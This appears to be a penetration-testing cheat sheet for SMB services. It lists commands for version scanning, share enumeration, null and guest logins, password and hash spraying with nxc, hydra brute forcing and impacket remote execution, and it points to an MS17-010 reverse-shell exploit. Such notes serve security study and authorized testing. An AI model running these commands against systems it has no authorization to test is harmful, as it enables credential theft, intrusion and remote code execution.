SMB (139 / 445)

GitHub - irgoncalves/smbclient_cheatsheet: Useful commands/tricks using smbclient/nmap in a pentesting/auditing/redteamingGitHub

1. Identify SMB Version

sudo nmap -p 139,445 -sV -Pn <IP>
tcpdump -i tun0 port <Port> and src <IP> -s0 -A -n 2>/dev/null & crackmapexec smb <IP> --shares --port <Port> 1>/dev/null 2>/dev/null

2. Common Scans/Enumeration

nmap

nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script "smb-vuln*" -p 139,445 <IP>

enum4linux

enum4linux -a <IP>
enum4linux -a <IP> -u <username> -p <password>

smbclient

Null Session: smbclient -N -L \\\\<IP>

Listing share contents: smbclient -L \\\\<IP>\\
Connecting to share: smbclient \\\\<IP>\\<share>\\ -U [domain\]<username>

Listing share permissions: smbmap -H <IP>

smbget

Download target file: smbget smb://<IP>//<share>/<file> [--user <username%password>]
Download target share: smbget -R smb://<IP>//<share>

crackmapexec

crackmapexec smb <IP> [--users | --shares]

Null/Guest Logins
    crackmapexec smb <IP> --shares -u ' ' -p ''
    crackmapexec smb <IP> --shares -u '' -p ''
    crackmapexec smb <IP> -u ' ' -p ''
    crackmapexec smb <IP> -u 'guest' -p ''

Checking authentication
    crackmapexec smb <IP> -u <user> -p <pass> --local-auth
    crackmapexec smb <IP> -u <user> -p <pass>

nxc

nxc smb <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc smb <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

impacket

impacket-smbexec [domain/]<username>[:password]@<IP>
impacket-psexec [domain/]<username>[:password]@<IP>
impacket-wmiexec [domain/]<username>[:password]@<IP>

hydra

hydra -L <users list> -P <password list> -f smb://<IP> [-p <port>]
hydra -l <username> -p <password> -f smb://<IP> [-p <port>]

Refer to https://github.com/3ndG4me/AutoBlue-MS17-010, for a reverse shell via MS17-010 exploit

PreviousHTTP(S) (80 / 443)NextFTP (21)

Last updated 10 months ago